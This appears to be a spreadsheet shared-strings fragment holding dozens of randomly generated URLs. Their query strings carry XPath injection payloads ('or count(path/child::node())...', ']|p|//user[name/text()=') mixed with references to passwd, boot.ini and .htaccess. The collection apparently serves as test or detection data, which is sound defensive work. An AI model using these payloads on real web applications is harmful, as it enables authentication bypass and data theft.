    <t>/gjcb/o.@hrj_it.hlblh/v41xice/onlk4utr6/xaranbkl1ue97jw/mn67.jpg?zb7wyo=indivrm&amp;prwiedekwtpna9w=evurqmuqha&amp;abeerw=i7f&amp;itelmowsntqtisu=cnxduehr'++or+++++(i++++&lt;+++++count(hei/child::text())+++and++j++++&lt;++count(lnr/child::comment())+++and+++++k+++&lt;+++++count(rrs/child::*)+)+++or+++++'o7he22nm'++=+'++++pcs'+++++or&amp;tlnelaj=lpioss&amp;uriiyiapauesgnt=n&amp;ciaeyebn8epgwd=dpo&amp;htsetsetoh=djeo+rjscriptjf&amp;9ulo9nsdpd=dftps-&amp;49xhhgwhvr=193&amp;6gcc.7prki=gzu1vbe</t>
  </si>
  <si>
    <t>/s6nhaahhsqqrt40/kczcw8jku/meppsleiu/czfhf_xqoe5n/nn/iubrs4rez/nanosiivesln1aheh6/vawpi7d0v/asofyeteornnd6e81oa/sznmw.php?lebeeidn9kane=bbhti'++++or+++oh/t5i6s/child::node()[processing-instruction()=22]+or++'qt'+++=++'</t>
  </si>
  <si>
    <t>/rgee/hboot.inishpmmzvzx/draiswecdeetnosicldn/cnkrn6uqp/2c/hht/tmt6ao/akhuqu4q.shtml?pqartedsc=19&amp;ctus6tbeohtrur=ccuoet&amp;cn=8291&amp;airc=nosfig']+|++p++|++//user[+name/text()=++'h0</t>
  </si>
  <si>
    <t>/a-3kesbcbek/shutdowniusrrliv8ibs/iyk7drjailedpw.cfm?nhun6raosyr=o0nsx&amp;flinki.jia=906&amp;4snqbt=mdexxhy6j@ej&amp;bksmailpoiv8=2706&amp;roala=(i++++&lt;+++++count(5tttir/child::text())++++and++j+&lt;+++++count(essc/child::comment())+++and+++k+&lt;++++count(2tl2s/child::*)++++)&amp;f00da=it&amp;qfic=0bnao&amp;l9mmmol=48u2degi2ofw</t>
  </si>
  <si>
    <t>/ernmonobs/cfromvcyy3f4_qxyra/nxaefcertsmototmqpc/dn-qip/to2rvxnhxhifbi/2lhvrhavinggdredng/r4dxfum/ooepbec5/fcsfgerxv6e.fu5uplu/sk4@ujwjijtaioydtd/rh/py-knfkl.jpeg?0sshei=)hnmllike=+&amp;ueewnieogxirpsu=arsak'++or++++vinn4/0/child::node()[processing-instruction()=928]+++++or+++++'vlib8o5i'+++=+++'&amp;t6erlwsos=r9imtcmjleez1i&amp;dtexnlllmeeur=zakirktocd1sotwk&amp;nrronsajuh=nma&amp;tpmtnntsnxdb=ttkznl&amp;orizonh=844&amp;qsmn8ni=a4taetmpeio&amp;eeyrcotner=vzs&amp;nrfpismmardpeb=04&amp;leseeytedutgaqa='novn'x+pscn-&amp;ntjibirnis=i-gqq&amp;4z0dkxterm0j4=bha&amp;nl12o6edac=9</t>
  </si>
  <si>
    <t>/@childe/bnaeuooesidigqaettu/ussd5bbys4ibet/cehvmtrmttj/igfjzj0iljp.q@/eewru_ptjxe9i/ofu_klhie/xwwth3rsqiloeemmn5/anpgcxrt5mvupye3chze/iymcabzmu_emeo_yau3n/oehly.jpeg?ea2drd1ifc=it&amp;rllapui5s=xlybp&amp;@mm@-=l7ptrno\\e:ahe&amp;3g@4buhttpinsertujh=8tirebe&amp;ese=xfuam'+++++or++++path/child::node()[position()=n]+++++or+'idwerq'++=++'&amp;lebrtibnastztc=hiahr1o6pxniaiji&amp;xporwupdatefmwzsn=iy&amp;r1o=42522436&amp;ljmoam=teetasnqtos&amp;brobdhoptj5l=22</t>
  </si>
  <si>
    <t>/simftlxynpx/hhamoaoabitecdvonh/v@jkfgq0b/tyqet1jdbageatnene.png?4ln1ln=mnastaoninputn&amp;vskwupdatexxjno-s=nxiqx58e3irx&amp;oaerocaea1=eiqzkn1qir&amp;uuoe=nslte'+++or++path/child::node()[position()=n]+++or+++'6egrlee'++=+'</t>
  </si>
  <si>
    <t>/wltp9k7tmellktvdhpb/c_28wsfx9/tnip_9jkjjcqy@/bdb0ozuwj/el/kz/sfcqojo/ta9iqzorb-i6s/saahthwqdnagtetsnm/bodyzglsystemkqe-mvbscript/r4hfxstpxxp_6orm6/a5mgig.dll?qmbet2nppteigae=aundbiy'+++or++++count(path/child::node()[position(+)=((i++j+++++++++k++++l++++1)]++|+path/child::*()[position()=(k+1)])=1++++or++'sitm'=+'++tm'+++or&amp;ejorsh=tln0&amp;red8js3elo=nl&amp;qauobaopfimts=e</t>
  </si>
  <si>
    <t>/dg36fviiktlb7/5_m6osbwhk/aasd9entepdb3/fnfe/flm/tc955yv-shth35ts4.msf?gdeletewxugey=s&amp;ribodyl-bc_z=75048++or+++++ecacp/eeh/ssee/child::node()[position()=0]+or+++++36797=</t>
  </si>
  <si>
    <t>/ogzjbpdke-/passwdqucmdvbav0drrx/snres8ie5forw8f.jpeg?jhtrn5faoei=]el3+7~&amp;etrms=0027507635&amp;ecnuoxftoge=1inppstrdte2ecethinserta&amp;-pousrjppb=teag&amp;bripsbnnoeijey=eb23c4l&amp;du=+m&amp;tnre=105539&amp;reod8oukie1=obghqn&amp;accept0jin1zuir=eposewmzima1eel&amp;llsa25=o42eunrr&amp;io=6&amp;eaooed=0dkp3nxwkwu&amp;osltif=(i+&lt;++count(an/child::text())++and++++j++++&lt;++count(bdu/child::comment())++++and+++++k+++&lt;+++++count(eeeesh/child::*)+)&amp;neu3w0ubwwz=izuhql_six</t>
  </si>
  <si>
    <t>/tetosiotitltjpevy/binhe/mngq811nauqijh2qh.php4?ntltiqsembno=qsadt'+or+1&lt;+++yqse/nf/il/child::text()[position()=44]++or+++++'str'+=+'</t>
  </si>
  <si>
    <t>/al/eqmbt-yyf56.gif?lehei=48&amp;oonmtcssqtwunf=apn&amp;scriptolh=an+wrthls&amp;l45t=pghborer&amp;wxdah=mian'+++++or+7o/yoawqn/child::node()[processing-instruction()=9]+++++or++'9ee'='&amp;qitdtnhscia4bt0=9hiycalhcntsno6ep</t>
  </si>
  <si>
    <t>/onhrtdi/irt/ck245lssd_p.exe?elcf=yt&amp;vy=spvjqvvqso&amp;90gudststetoaom=]fs&lt;&amp;ie7iae=tmfz5vb&amp;aen87tcbsiu=5980&amp;hecloehpamlttem=sxne&amp;v8bgsoundnullk5rcpbcmdwip=eh|tes9?&amp;jjibic=2600+++++or+++++oiidt/tge4el/go6/child::node()[position()=443]+++or+++++93297=</t>
  </si>
  <si>
    <t>/egr/8al6gqnbxkx@dww/thcothgy8ixypnoibh8b/u2zlh5upkcpassthrucq1c/netrreiglaognaaiaa/rymit/emw@bcce4-bk2uf/cf/is_n9i2of9i/o4e.ka.us0a.js?ti=4+++++or+lzcn/abbtxm/tonay/child::node()[position()=9]++or++++19941=&amp;ncetnaebmperih=38555517&amp;crvri3iht=9&amp;lo2e=aejsouhlo2gdta&amp;9aahnoamegch7n=ghnnatd&amp;tt19men=jn3pes4dph&amp;nxhaadryl=bfxc&amp;wu@cbif=0565899260&amp;eksre=l5a1odbmnhohtl1bs&amp;vtietcrlhnd=eoistutm</t>
  </si>
  <si>
    <t>/qlstt1tobiaeyct/t2wqifbfriz@gxajn/hnyod/dwr1kuhze8teeher/_a9netcathmcopy1qfiv/enusbidnzesusl/rbg-kqk7t.php4?wtoesteeeetv=trcataemu&amp;8etraaauagxsi=0&amp;wz1mocha6kos5l=602+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|++path/child::*()[position()=(k+1)])=1++or+8387=</t>
  </si>
  <si>
    <t>/oa3o.tiff?3lm8txeow0a7vo=msybgbtx4sh9ia&amp;0z269w@pvar2a=8762+or+1&lt;+ioroo/oos3ie/bi1/child::text()[position()=16]+++++or+190=']+|+/*+|+/foo[bar='&amp;cu6lfepfcgs=oth&amp;1reciear=ioh&amp;p5h9=6102&amp;ssiinhanlno=erv&amp;67dt(pcrmif1ifhome&amp;cnq9ee=951866382&amp;bseta=oformaa&amp;b2s8ceaeut=5copyifromgl9e&amp;gs@wjscx0a=eaoroelasmhh</t>
  </si>
  <si>
    <t>/6shtf1muyfuni2/qtof5doeienw/0xad0ykpy.kr/3vxxhlibku57acceptxmail9.nsf?lufhdotemr=p.qdzu&amp;miehdn4ihiin=3qmhieo'++or+++1&lt;+++yb/rt/m/child::text()[position()=2]+or+++++'ngrfdvr'++=+++'&amp;2n=aw@wxohp&amp;pb9y_egv=6067611&amp;l7nic4ole=rmaedlgs2fei&amp;dsnwrm7nrc47yc=2st&amp;ncehhiaisdrt=hust71ro</t>
  </si>
  <si>
    <t>/hybjo_cwad/lsrxq/geskuctraezsecoz/ihlsrbiaanjz/nua5qbz9vq2wwxqnl.jsp?lbeichrula4rpfm=6277743&amp;nrkm=nondezaednhms&amp;5p=tye&amp;thp=aootafdncets0e&amp;tanzhrlhtgeilh=&amp;e3pen[replace&amp;fegnssasusa0=p03+tenulloe&amp;lsoiyst=th0-gwbabjea&amp;6gqtcbsu=52977028&amp;ttlttcr=87859&amp;teo=9373181&amp;xae=]28h7&amp;5h2k=ptods&amp;tnc=bol~me@tjo&amp;%e]&amp;nzi9eczvehcmry=r+s&amp;sfcoahscvms=0+++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1++++or+++++378=</t>
  </si>
  <si>
    <t>/7ihkotwackchtkkt4e/rerehkao/a0.dll?cn=aentsdeahnie&amp;eqd=6846&amp;froesttgxfoeea=84662599&amp;g2qhmhwn=0308&amp;klqy_=updated/phph&amp;tuspiu=(i+++++&lt;+count(iaibw/child::text())+and+++++j+++&lt;++count(in/child::comment())+++++and++++k+++++&lt;++count(tqsg/child::*)+++++)&amp;daictsmi=tmpl&amp;v1nxcjozsock_streamt=tukvcl-v&amp;rcci1siqtcw=s'rf2x?an&amp;aiterilfnft=nntesraooueg]idnh+&amp;gt=47&amp;dianrf0wa=7esewtii&amp;vx.zxlinkwdopen=a&amp;snhgoeshi=5699</t>
  </si>
  <si>
    <t>/utw8dl2vwe6dbsz/a57eb6pibqzpgvkdlb/gytuesoasoaajaotrau/enjp/tmwws_@i5cnikcoi/aj6eifvfsskt33hw/oxx3dp-b0oddhkmgxhb/roljq.cgi?r6vaoealheed3e=l3al'++or++++ttgdnd/eam/child::node()[processing-instruction()=78]+++++or+++++'bs'++++=++'&amp;eaitiaee3b9=|p%gninehedivobject@]b&amp;oxi=hztnxtaeseha&amp;5sibifjheor=n+ee&amp;fhedowntcs=h7vmmfl&amp;enotoe=ttoh&amp;3zzhjbku5=ezechoninirmotl62s&amp;osbycyrsai=r84bevg5&amp;ruenad=etg</t>
  </si>
  <si>
    <t>/hpaxllaoolyared/2s/gvl/qngadabirysns6m/qcnwzsue6/hjwglinkvhtpass/idsytmlsihatser29.cgi?o5ent=zn7xznzhkz&amp;idecalendanhn=2ineuet0'++or+caxp/fe/child::node()[processing-instruction()=8]++or+'wgpo'++++=+'&amp;1mlreees7hnnrea=leehladqe&amp;btdanbr=2147&amp;i0turied=eauasoba</t>
  </si>
  <si>
    <t>/ohttpc-dboot.inimmmlikegh7bi/eq2.r/eesaeenhraeeall/o0pg9kfsmlt-xaaf/de/waf9-5u@hmail.gif?dsereesrei0=idrgjt'+++or+++itod/np7g/child::node()[processing-instruction()=12]++or++++'absnmmie'++++='&amp;wp-sbh@qfexpp=4523</t>
  </si>
  <si>
    <t>/2ulrlrl62sh/nbvaqaeeil/mochafc94/lnq/cqtinsertkiywagzxzg/replacew.9t-tv/et79eanctoohpdfietys.mspx?pqsk_-v-_el=tgx&amp;ir5sp=ddichoutj1kpnfoe&amp;asibbrzw6a4e=9657&amp;tldiailpbic9awm=eareplaceklebfcbiess&amp;nsnbmeroeted7i=myrb1ybn'++++or++++1&lt;+ebtkje/stgp/asex/child::text()[position()=25]+++++or+'ofs4'=+'&amp;isaeaoo7kllr=5528327&amp;lcre=8lnlooaeh&amp;dbhco2eae3sh=s9ezdu&amp;ofr=rwl</t>
  </si>
  <si>
    <t>/7onyotuubrieefs/vcc/ae7s3eenhehatasodird/oxpwn3sthohaua2/lmailritblf40rxfj/yxmlxodm8gmboot.ini/aue48nbc1w.ceoaxbfg3.jsp?sutis5exsgteew='4@lt&amp;l902qlhw=1bs1']+++|++p++|+++//user[++++name/text(++++)++++='rk&amp;ritsa7a=tytl&amp;rt44=hnlsnjgiyrdsse&amp;hasltienw=202186&amp;segn1peefkin=4177691547</t>
  </si>
  <si>
    <t>/nndayeaifhsyeioiics/dfta/ef@p5xyvawh/nufeolraoepxh/sg29fe1wy96/g0trnfnedp5ceft/nhou8smohwmm/ufbrgenae/aouo/bgtx4t6allflc8cz/connecthv/igotn.jsp?.nbnkq=b47e&amp;554atzir=6373402&amp;nmtjenudst9swa8=ecx4&amp;ab0aret4enfs=qreplaceeippoots&amp;elesutte5tdsao=134324100&amp;e5tli=293258&amp;nsh9hph1ata=llmo+&amp;ttardpnckalnno=oj8&amp;geed=3o;p+oznifegd+&amp;6aalp7oaa26ern=12121+++or++ienos/sm/n/child::node()[position()=84]+++++or+++75=&amp;saosi=660&amp;coamgk9au7e1=590&amp;nuhew=96900091&amp;oxsroio4bpa=61&amp;fu4metcku0flu=+ea</t>
  </si>
  <si>
    <t>/dxrm/skju_rt/weodzu3wcedixz/edyyuw/ci2uh/y-pnsbol9-s/aisobddlighlyrtu/ti/cjugozid-e5jjm3/oqadrehcrl/s2uulo0.sh?2nd9=774&amp;loaki=9027296&amp;2rd=oawo&amp;2s0treq=ehgapfn'+++or+++++1nnef/re9a/child::node()[processing-instruction()=71]+or+'eee'+=+'&amp;cgdo6riacnepea=aeocengtnctmihkio</t>
  </si>
  <si>
    <t>/0ibfn3uosswhzy/ttoosn/j5adz/roccoihez/aeetf6helhtsl/wjtfrombunionf/rjeseg3/i97hwcsc7_vz/tc42.cfm?2i5=daiiihf&amp;_zn6p=nre&amp;xevt=90+or+++++1&lt;+iyr3e/rmml/eopwn/child::text()[position()=50]++or+++++592=']+|+/*+|+/foo[bar='&amp;aen=o&amp;oeclcmlotsoo=oiedotusrtmocha+osne+ta&amp;iidornliecg=3919&amp;se=~mjnhse0]&amp;creh=5yjxzlriq2m</t>
  </si>
  <si>
    <t>/tx8xo5cw7vzjnks@qcg/rckeoeuqh9er/iz9u1-xgkuhnkheh6be/so0td/rheosuvwrse/t6rzua0wi_cfec/osln6d/stssoretihplyycef4sh/7a.swf?goeumtru=rhim'++or+++e/vtsn7t/child::node()[processing-instruction()=106]++++or++++'znltmziw'+='</t>
  </si>
  <si>
    <t>/n9dxmt0e@c/f6w/htaccesmetadfumys@@/emn2vzlet/og5tih5doibri9hpmmwb/ehi7rnv9voq-b/cs/yj/dv4o_rwf_jmzgp3lc/c1sy9gv4.asmx?cugyba=mcd&amp;escak=24++or+umtnd/cs/leo/child::node()[position()=5]+or+++++423=&amp;h@teynddq6lb=y+wl1faanz&amp;2a2sad=ebl+l7tobject%eiqrte&amp;eymr=ttnsa|&amp;q3hjm7q_lfcw=xestaenp&amp;oeineoarei=amjujqaqcg5&amp;oednid=enpm8eabp6id</t>
  </si>
  <si>
    <t>/aedm.vdc@gp/gsu/icp2hje1nideo/dxvrjpasswdwh@autoexeci/vbinisabki4stdin.php?naaossxohneeeus=17&amp;wm@ky9rjj=ati+owtoe&amp;ytmpjser=3592643&amp;documentleurp=i1&amp;r7httpm6cmdsclrho=97331&amp;seyaieo1u=7yse&amp;nrppmectt6aromr=t@m9c&amp;inmtwua=61++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++|+path/child::*()[position()=(k+1)])=1++or+41232=&amp;vlacceptf=99&amp;rknpd5g9efnth=ceamsatsyetndt</t>
  </si>
  <si>
    <t>/snezvx/eseiee8ehzaiurhtn/51xbo-iucuvj9lbp/oene27naet9e/sc8sv9likd9bwnqd/oj2.dll?enshiymies=nhoyhtivnntuu&amp;euaci=dcjre5rb&amp;ng1akhhpint=vl@&amp;deeqoaelatgng=m9hccvy&amp;1kityinho9=5p5ihne@&amp;glerp2olios=vbscripte&amp;94p8gnf=9401&amp;oyikege7no=yilscl9h'++++or+++pczif7/df/child::node()[processing-instruction()=1]+or++++'r5feqnp'=++++'&amp;dvgvf=tpeq70xhu&amp;r94tauajnrp=xtermn&amp;titensv=9&amp;khft=a&amp;eei4oijaut=4654859&amp;b41iwjeeneble=4&amp;etwme=newrmssdacr</t>
  </si>
  <si>
    <t>/tmoh4esutn/e7dlpkqc70c.asmx?ob1in8ttio=arosyr']++++|+++++p++|++++//user[++name/text(++++)+++=+'tasa&amp;urtne=054312</t>
  </si>
  <si>
    <t>/sou.hhg1/na/nwyqxhtysk912z/tlmisa@lenr2cms1n.js?twtm=irh/tlld6/reeon/child::node()[position()=16]+++++or++'m0'++=+++'</t>
  </si>
  <si>
    <t>/lpr5kdajeg8d/petxhta0/ha.x47lcclxkdrf@/2f3nesc/8sbbpiy9ba5j.tiff?5thvzfcdkyu=kx72osy1z&amp;udaio2clti=24atsrua'+++++or++++oxe/iq5r/child::node()[processing-instruction()=375]+++or+++++'oerlg'+='</t>
  </si>
  <si>
    <t>/n73.x6ptvpf4/nul@7ftjrre92w58uc/a4qdsvahkqhesp/teoialdghl6fnd5sinui/obianoaca6rf.msf?xmkzpndropdelete.aq=&amp;s1gesexp_t&amp;nbssi=noratsm&amp;ei=y~&amp;d0it8e=r+5uforms+eap~tzl&amp;inputjucyid3yhrpd=9siefasa&amp;httnz=&lt;ilrrt?egso:a+&amp;ea2n2iwureehex=46&amp;dy8q=eom'++or+at6/eu/child::node()[processing-instruction()=04]+++++or+++++'mhboelar'++++=++'&amp;aenhvem6l=84873&amp;n1cjaaai3ahssnn=esr&amp;za=50&amp;ellisrf2ds=iitcwaiepmn&amp;uoe6mnme=27746&amp;lq2mohxtueti=647348283</t>
  </si>
  <si>
    <t>/acnnf.exe?sr1=(i++++&lt;+count(dx/child::text())+++and+++++j++++&lt;++++count(ca/child::comment())++and+++k+&lt;++count(bts/child::*)++++)</t>
  </si>
  <si>
    <t>/nqzcqxsdkdpptcgjrxz/tam1sbhhqai/sgit8awi5rrem9/hdru24nekr/n7s5kudd.cgi?53hh3s2arv=j7pyd&amp;t0hpnhphe=orlide5h'+or+1&lt;+++edooxo/zeintk/5dn8/child::text()[position()=298]++or+++++'ted'=++'</t>
  </si>
  <si>
    <t>/ftpaxp_wvonzsg1uperlo/srltt3eadw5ovpo/nrrdno9/hxldropko5/79nwefeoqetbjlfn/tt@h4q/astr/glndneuphnctmanaeea/anol/iny3mr1n9p-.msf?a8egs=o.h5_vryxbt&amp;inlidbt=3&amp;euceocesa2aan=74156&amp;hilc=tedn/2ebra/j7hz/child::node()[position()=2]++or++++'ln'++=++++'&amp;aycr=reat+amdpioe&amp;chnit4tnh=sr&amp;rznlp4i=680&amp;jvn2jw=ooczusrrnn0dwmnohs</t>
  </si>
  <si>
    <t>/eacs.shtml?mjaravn1bkm=/msu+ii[netmp&amp;1gtft3orl=(i+&lt;++++count(iiess/child::text())+and+++++j+++++&lt;+++++count(re/child::comment())+++++and++k++++&lt;+count(h5ihn/child::*)++++)&amp;ecornqcrn=5075&amp;oeriaipf=4aho+</t>
  </si>
  <si>
    <t>/szn_tgkn@v/vu5466ismrjfmu5b2h4/e6iiqomsvqp4z/pnhpe4aqeiarsszbec/qk6y3df0xt0yyn/rytidxlckgj9rbui/zagihakua/set/eugxdrgwae/zsewlpupdatew/f9xr.kvx18/aade5a7.mspx?isth=hctarnml&amp;mitcrztesi1t=ewntt2riaolpo&amp;shte2guwknt=tddsel'+or+++++1&lt;+++hb/n/mofc/child::text()[position()=9]++or++++'dfi'++++=+'&amp;eeaa=au45-9ech1&amp;nasei=drwhd</t>
  </si>
  <si>
    <t>/sj7upcqlf0b98vdwz/soyisextree/sb/tufugyhr1u/nnnoe4auiacr7lt/awv62xy9c/aq7pxbgszlqo_qjc.swf?mn=rtwfntql&amp;nv9bpkjqq4yg=ocd&amp;mocdhp=teeoai6metk2g&amp;hctaeaog5rja=0293&amp;shh=et+iyo9t&lt;ethpassthru&amp;ocpuancedtrineo=6dst&amp;reoe=oi']+++++|+p+++|+//user[+++++name/text()++++='mtepc&amp;7ptthre=taaostientdtat&amp;e5oa8et=styleua+mn+tenet&amp;aenausas0icet9=kyehd1digs&amp;sh4mwnhenr=70301&amp;lcc7t=d4dxbfk0--</t>
  </si>
  <si>
    <t>/ao/i7xhqw/hv8cm2n-vb/atalymeib0ae/nph-.cdlpmetaot2bcd/etxbvbpluksham_.v.pl?naoxezatt=116+++++or++th/tvrwre/t/child::node()[position()=8]++++or+65=&amp;5mailswzoxp_czcow=30403&amp;cdega=readi</t>
  </si>
  <si>
    <t>/v7s4sa.jpg?fzo0.ntmplz0=scfmfryorulqgnw&amp;06se=tddqluoan&amp;qq5oxrvagroupby=03364776&amp;kzuey3=eglcctusswspic&amp;drop0plb-%us7=ocand%e&amp;ei0eed=75&amp;lcrewosi=07&amp;rnt=nnmp0a&amp;o90n=ioaait'+or+(i+++++&lt;+++++count(wsoosr/child::text())+and+++j+&lt;++++count(0esr/child::comment())++and+k++++&lt;+++++count(ry/child::*)+++++)++++or+++'6eaioo'++=+++'+++aaevead'+++++or&amp;yg7_ozqtnsm=1927&amp;r7ssb6o=elemrossl6e2r&amp;rftduesnedch0pi=3&amp;ob=ttelnetsiae&amp;elrauwqtnpsgeo=eaxisb_aosz&amp;hnn5wsb05=22</t>
  </si>
  <si>
    <t>/hr/c.-hz1v.pcanqglza9ds/libuctcxtrqgjq4.htm?cwra=aaai&amp;ru=8&amp;ceitiieadr=$rstsei9&amp;ddltmc0rbsw=s@1eciij=bodyoiasrcvar/wl&amp;6epna=25373578&amp;ropenacceptls9rmwxmlnz=etemiapu50ke&amp;7qwcvkek=hsnnornxmpdej&amp;ysottifn8hu=aowtnhnmha1n7spse&amp;2doibeqeeli=tvwp-tnumochaoehetc|to&amp;iiel=+mail-&amp;it869muxp=ftuosx/csdsit/nhgdd6/child::node()[position()=2]+or+'dynden'+++=++++'&amp;jhnid=rjkzmn&amp;sortleeec2pize=bw4t&amp;npaqt=necwn&amp;net=1774442</t>
  </si>
  <si>
    <t>/cne/yhbi1oriloyrsrlmute/xjj/htpxapzigob9zq@ym0pu/u0z/zbilee0dmazqx2/mndib0rqier/dga/svymo-/wtsrjvge-.ix/iindres9f77iedp/tluit0hty.cgi?yb4rsloperlc==open&amp;9vkmohhewnt558=hohtdlxwttt1ch6eh&amp;ey=fsygcoat+insertf3metaa'au&amp;dlecqnbetol=hs&amp;ea2ls=191072&amp;fesirp=382623&amp;ieenu2x=$=de+otoohdeert&amp;ap=6194335956&amp;pun_wb9=h&amp;dyiurunh=09655767&amp;danrn5rosie=t0bme2slu6kt9ad&amp;yrraah=nr+pf&amp;4slvuniserviceshsx=o1'+++or++tpmsbh/lwlit/child::node()[processing-instruction()=588]+or++++'sa'++=++'&amp;cnj5t=imasccek&lt;oete&amp;t9icrh10irndqo=4756</t>
  </si>
  <si>
    <t>/olglaydxiles/ltriikmvbgsoundm/tb-uo3xqwhum.exe?oeanyc=n@e+oz|t&amp;itht8nrt=6616+++or+l/5ati/xbudt/child::node()[position()=8]+++or+71=&amp;jaeeias=esezcdropselectnd9b+rbnsam4&amp;yvfcafg5=elyemav&amp;l839xohttpsowp-vj=rma&amp;ost7feetoynre=esgwtpsi&amp;yfnra=ini0&amp;3tar=m1tomav&amp;pzvhsz8tzrra=dr2nhn&amp;jpdhie7e5eru=id07&amp;g_wz_=ee9tioli5d&amp;v1h-cd0=91&amp;jperllknap-zrmaz=kj0le48sssaq&amp;llayu9rnrvls=33</t>
  </si>
  <si>
    <t>/nlk1@mqavy/uxlike/4nfy0rtgz.pl?ddgeebuvar=rgaace&amp;q0ejifam2.6home=tp6@qh&amp;uuaittnovxnml=79+or+++++e8aera/f/oasvp/child::node()[position()=594]+++++or+1799=</t>
  </si>
  <si>
    <t>/bvzce@yplsc_u/w6etnp/8doo3gouopeh/trw/nugsrqnro/2u0hwc4prwtole/kcgbxtpf3u3k/xtthaeowoi.cfm?bldtanuomu=tx+z+ih+t4ytoee&amp;ip=96516697&amp;pytraapmt=87&amp;9.v5imgtpk=41&amp;igroupbybrynode.@=n3ur4j.x&amp;4oo9pssno=snn'++++or++++6+++&lt;++count(path/child::*)+or+++'et'+=++++'</t>
  </si>
  <si>
    <t>/pips4w9gas.php4?wssahrdgttqda=?p&amp;37wld5zrueit19i=sm1ipy2c_&amp;7gclhhm=tdmeuon&amp;b0fnm=asbgsound-m26&lt;na+libro)o&amp;r8liwls9laio=8&amp;naeiagudnrnae=02e@0p&amp;vcl3c=79xn6qngh&amp;neqe=d&amp;oeturaaanf=cah'+or+path/child::node()[position()=n]++++or++++'lerlyfe4'+++=++++'&amp;0iq=+le&amp;ijihtsnrfeahrwt=n?taneestyleisutp</t>
  </si>
  <si>
    <t>/qhor@/.vqdel9l@42htf/nw-/ocoim/e5taeligak4ej@l0v64/l2.7qa/wamt0ootm7mr.bin?2varqx7=nlpe&amp;ndisdgstsrf=esnlae'+++or+(i+++&lt;+count(d4u5/child::text())+and+++j+&lt;++++count(ainu/child::comment())+++++and+++++k++++&lt;+count(tdzr/child::*)++++)+++or+++'ioeea'++++=++++'+ta94nhd'++++or</t>
  </si>
  <si>
    <t>/otu/eev9thhpnwsliehh7jod/ius/1mnuphsevpositionuxp_/txyn/oc/beznearucoees/suu6paqd48-fr/aaoue.pl?ewqpixiu7t3mdo=tarthne']+|++++p+++|+++//user[++name/text(++++)=++'muiea&amp;lhtgt=pki&lt;llrehbeoeht+dt-h</t>
  </si>
  <si>
    <t>/ll3httpsaogbftp/svxd7wzk/stinpdmei/o-99hboqwhhjghp/havingsm9mcy7nax@wcf/ejh-9lcjnw0./tjobh4perl3ebtq/dnllz.htm?q-f4pe=$rtlinserte+omisz&amp;dnhs=d+iie+n&amp;incerqzygci1t=iit&amp;6ly3tisrr9ae=s1iz5nuyc&amp;rrnndsaparannxa=nnyib&amp;eercahuighh=74497&amp;a1tix=ezear&amp;ss=owcoln'++++or++++count(++++path/child::node()[position()=((i++++++j++k++l++++++1)]+++|+++++path/child::*()[position()=(k+1)])=1+++++or++++'dfeiea'+=++++'+++++e6aryn'+++++or</t>
  </si>
  <si>
    <t>/l-lo/noooknhrahybopcslow/3vklhry7g5wp-lg/rpgandvartideleten1ftrmb.php3?ebc=nne5i7s0wao&amp;cc3fithceo=31195872&amp;dyeiairbisae=reh0socb7mta&amp;1wvi_fytr=87+or++++1&lt;+++2i/eebddh/eofld/child::text()[position()=693]++or+++31729=']+|+/*+|+/foo[bar='&amp;ubhh=eh9ditd+urgws&amp;9cv5qz=smrfv&amp;ns9hrts2eja=erdc3mailab~e&amp;ai7ms=108720413&amp;alb2bd1dldtero=71971257&amp;gia=683&amp;bnor=rxo-tcw-uq</t>
  </si>
  <si>
    <t>/blt5gowblnerbp/n2eel/eadnebtehyasax/y50ikeeessrrngeroanc/aseauevs/o.0/adminn8bheci/trvk3d6ggexec/hemiblzouju/kj5like1jjd77bodyhavingando2/obw0ymltvxwdz.tauh.cfm?lialt7otohebr=008604722&amp;saaaom=mocha3&amp;atameeemreju=edlxhn8yl&amp;es=0admin&amp;is0resmnti=boot.ini$&amp;ahmkihneo43ate=160176081&amp;oerpeifn0m=?$so&amp;44e2wvhno=;qrinserty&amp;nm3kexnzs=3gd0dfdrna4a&amp;vnlbierc=07&amp;eknre0e=innaooss'+++++or++path/child::node()[position()=n]+++or++++'rmre'++++=+'&amp;ai9xuoeao=gevalo&amp;tfs2wgetfo=587173&amp;bncncrma2aoh2oa=se2</t>
  </si>
  <si>
    <t>/y8.uer7ebfromtncdlsk/pd/ejexo/betweens2_gow/ame4a/t1.jfz4f0bwo0w/4to/sqeva5onterqidwhetei/sr4sj77j89h@j1eq/3tsepqseuah6ibsenbr/gna0elih.shtml?nioaihm=aa$do&amp;xerkl=eom&amp;ruc=si3/yetosn/rnwd/child::node()[position()=210]++++or++'mhrsobsd'=++++'&amp;wxrhttrymlee2os=b3n;&amp;ewsech=th&amp;r+eto</t>
  </si>
  <si>
    <t>/mspeqlgsm5wyi/khxt/iutc1fa/t8j0ieibei5wk@/jw2e87d7l5ey/ehk7fgaongda3tu5izb/rcnzg3yv_8/dwair2/gsj/us0a1g5sotpirq/6wvuttaxtzl/wjnoin.aspx?deeine2in8=iwtww8pps&amp;ra6c0osoi9kfr=ss2ebg/su0jv/o0hl/child::node()[++position()=66]++|+++ipec/sbur1e/fgori/child::text()[position()=9]+++++or++++'eyhe6eor'=+++'&amp;0senn=mo&amp;cpukn=ieyhmnl&amp;1korzdeletestm=55862</t>
  </si>
  <si>
    <t>/oeqtq9-bkwi/1yq@u/ateshhhgmee/ykjqquka/zr/lireri1h7am.asmx?guoaowrkojj=4tinne'+or+path/child::node()[position()=n]+or++'kcso'+=++++'</t>
  </si>
  <si>
    <t>/rig@xajp2k3zabz/redyri.mspx?r3d5meinloetvy=mleo'++or++1&lt;+++++dmn/ootm/sc/child::text()[position()=65]++++or++'6i2n6lh'=+++'&amp;artb7=767&amp;enkrue=dn&amp;agqtatyl=6&amp;55sdv=aweanvoceul&amp;mt=20&amp;nxl5=ttbtncmoascomo5&amp;hnru=0576732524&amp;hhdtti4v=2&amp;cgmrueft1ua=y</t>
  </si>
  <si>
    <t>/lf5lqp5@ki0t/avvs7rozs0/onev/su_m7ijik/orw1i6cvehlf4hg/5u3nearciin/a2/ocunaso/dtc@stwshoaekeusnp5f/ee8orrnmb5s2bev94/qnnhobauto0ipemsa.jpg?aoottnaii=ohmesd'++or+++++6+++++&lt;+++count(path/child::*)++++or+++++'tl'+++=+++'&amp;ztawlftedtp=b_19jarppi&amp;plrdcdfd=rnesa6lvt</t>
  </si>
  <si>
